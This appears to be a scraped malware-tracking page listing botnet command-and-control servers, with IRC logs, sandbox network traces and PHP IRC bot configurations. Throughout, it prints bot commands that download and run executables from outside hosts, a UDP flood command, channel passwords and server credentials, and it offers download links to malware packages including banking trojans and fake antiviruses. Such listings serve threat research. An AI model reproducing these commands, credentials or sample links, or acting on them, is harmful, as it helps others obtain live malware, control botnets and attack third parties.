botnet C&C irc hahahaha.ishtiben.com DNS_TYPE_A 60.190.218.104 123.183.217.32 59.63.157.62 60.190.218.104:7196 Now talking in #! Topic is ‘.asc -S|.http http://194.28.44.208/new1.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a|.r.getfile -S|.r.getfile http://194.28.44.208/m.exe C:xdx.exe 1 -s’ HKLMSOFTWAREMicrosoftWindowsCurrentVer!policiesExplorerRun Microsoft DriverRead more...
aminizakoycam.co.cc(botnet hosted in Turkey Engin Rencber)
Remote Host Port Number 178.162.158.138 6667 PASS timu 74.86.183.197 80 MODE USA|86530 -x+i JOIN #1 timu USERHOST USA|86530 PRIVMSG #1 :- download – Downloading URL: http://www.freeflow.in/am2.exe to: c:/am2.exe. – downloaded 96.5 KB to c:/am2.exe @ 96.5 KB/sec – opened c:/am2.exe NICK USA|86530 USER ppdqhcd 0 0 :USA|86530 NICK [USA|XP|539487] USER srmyidk * 0 :COMPUTERNAME infosRead more...
onlinedatingsecretfriends.com(gbot hosted in United States Austin Road Runner Holdco Llc)
folusho.com 67.222.55.143 127.0.0.1 127.0.0.1 hostinganddedic.com 188.72.230.129 searchmobilecode.com zonetf.com www.google.com 74.125.77.147 www.yahoo.com 87.248.122.122 Opened listening TCP connection on port: 62970 Outgoing connection to remote server: folusho.com TCP port 80 Outgoing connection to remote server: hostinganddedic.com TCP port 80 Outgoing connection to remote server: www.google.com TCP port 80 Outgoing connection to remote server: www.yahoo.com TCP port 80Read more...
25 mb exe samples
Another package with diferent malwares like fake antiviruses banking trojans etc Download: http://85a5a935.goneviral.com
jkconstrutora1.com.br(spyeye hosted in Brazil Sao Paulo Comite Gestor Da Internet No Brasil)
Remote Host Port Number 187.17.96.104 80 The data identified by the following URLs was then requested from the remote web server: http://jkconstrutora1.com.br/hjyyy/b1.png http://jkconstrutora1.com.br/hjyyy/b2.png http://jkconstrutora1.com.br/bala/Funcoes.php http://jkconstrutora1.com.br/hjyyy/b3.png http://jkconstrutora1.com.br/hjyyy/b4.png exe file http://890019c0.linkbucks.com infos about hosting http://whois.domaintools.com/187.17.96.104
216.246.15.205(botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number 204.0.5.41 80 216.178.38.224 80 63.135.80.46 80 216.246.15.205 1866 PASS xxx NICK NEW-[USA|00|P|27138] USER XP-4150 * 0 :COMPUTERNAME MODE NEW-[USA|00|P|27138] -ix JOIN #!high! test PONG 22 MOTD infos about hosting: http://whois.domaintools.com/216.246.15.205
maffiaxl.nl(linux bots hosted in Netherlands Amsterdam Interambition.com B.vo
var $config = array(“server”=>”donville.nl”, “port”=>”6667”, “pass”=>””, “prefix”=>”botnet”, “maxrand”=>”8”, “chan”=>”#vendas”, “chan2″=>”#”, “key”=>”1”, “modes”=>”+p”, “password”=>”tibia”, “trigger”=>”.”, “hostauth”=>”*” / * Now talking in #vendas * [I]botnet06877175 (botnet4151471@Donville-40bc2c45.fyi.net) has joined #vendas * [I]botnet71459373 (botnet6754926@Donville-40bc2c45.fyi.net) has joined #vendas * [I]botnet26055411 (botnet7636246@fa912d.7ff894.125b3c.c32e93) has joined #vendas * [I]botnet50285451 (botnet1535464@fa912d.7ff894.125b3c.c32e93) has joined #vendas * [A]botnet98885167 (botnet6937716@58734c.4409b5.d85eb7.b503c1) has joined #vendas * [A]botnet71165626 (botnet6786395@58734c.4409b5.d85eb7.b503c1) hasRead more...
122.155.8.127(linux bots hosted in Thailand Bangkok Cat Telecom Data Comm. Dept Idc Office)
var $config = array(“server”=>”122.155.8.127”, “port”=>”3306”, “pass”=>””, “prefix”=>”[c4]”, “maxrand”=>”4”, “chan”=>”#mathzor”, “chan2″=>””, “key”=>”puto”, “modes”=>”+p”, “password”=>”math”, “trigger”=>”.”, “hostauth”=>”*” // * for any hostname (remember: /setvhost pucorp.org) Current local users: 4 Max: 410 Current global users: 4 Max: 410 * piratox (~piratox@46.102.241.XX) has joined #nogrod .user lol321 .info .udpflood 127.0.0.1 1 1 [ UdpFlood Started! ] [ UdpFlood Started!Read more...
184.106.189.63(linux bots hosted in United States San Antonio Slicehost)
var $config = array(“server”=>”184.106.189.63”, “port”=>”6667”, “pass”=>”manis”, “prefix”=>”virgin|”, “maxrand”=>”5”, “chan”=>”#indoflas”, “chan2″=>”#invio”, “key”=>”nademkra”, “modes”=>”+q”, “password”=>”manis”, “trigger”=>”.”, “hostauth”=>”n.G.G.r.E.m.e.T” // * for any hostname (remember: /setvhost n.G.G.r.E.m.e.T ) infos about hosting: http://whois.domaintools.com/184.106.189.63
ke3.no-ip.org(american rat user from United States Carol Stream AT&T Internet Services)
ke3.no-ip.org 99.135.162.93 Outgoing connection to remote server: ke3.no-ip.org TCP port 4444 Outgoing connection to remote server: 192.168.1.50 TCP port 4444 Outgoing connection to remote server: ke3.no-ip.org TCP port 4444 exe file http://www.multiupload.com/4HDYGAW831 infos about hecker http://whois.domaintools.com/99.135.162.93